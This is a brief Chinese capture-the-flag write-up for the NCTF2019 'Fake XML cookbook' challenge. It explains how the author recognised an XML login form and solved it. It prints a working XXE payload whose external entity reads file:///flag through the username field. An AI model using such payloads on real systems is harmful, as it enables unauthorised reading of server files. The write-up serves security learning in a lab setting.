[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
llkk星期五1 天前
Mujoco xml模型
xml·ubuntu·机器人
斗锋在干嘛1 天前
Android里面如何优化xml布局
android·xml
inxunoffice3 天前
批量将 txt/html/json/xml/csv 等文本拆分成多个文件
xml
梦幻加菲猫3 天前
XML在线格式化 - 加菲工具
xml
XiaoLeisj4 天前
【MyBatis】深入解析 MyBatis:关于注解和 XML 的 MyBatis 开发方案下字段名不一致的的查询映射解决方案
xml·java·spring boot·spring·java-ee·tomcat·mybatis
whisperrr.4 天前
【spring02】Spring 管理 Bean-IOC,基于 XML 配置 bean
xml·java·spring
Kika写代码5 天前
【Android】UI开发:XML布局与Jetpack Compose的全面对比指南
android·xml·ui
stevenzqzq5 天前
Android studio xml布局预览中 Automotive和Autotive Distant Display的区别
android·xml·android studio
兰琛6 天前
Compose组件转换XML布局
android·xml·kotlin
inxunoffice6 天前
按规则批量修改 txt/html/json/xml/csv/记事本等文本文件内容
xml·json
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02我决定放弃搞 Java 了03DeepSeek各版本说明与优缺点分析04DeepSeek RAGFlow构建本地知识库系统05汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量06如何在WPS和Word/Excel中直接使用DeepSeek功能07从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑08生活电子常识--删除谷歌浏览器搜索记录09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10Nvidia Isaac Sim搭建仿真环境 入门教程 2024(4)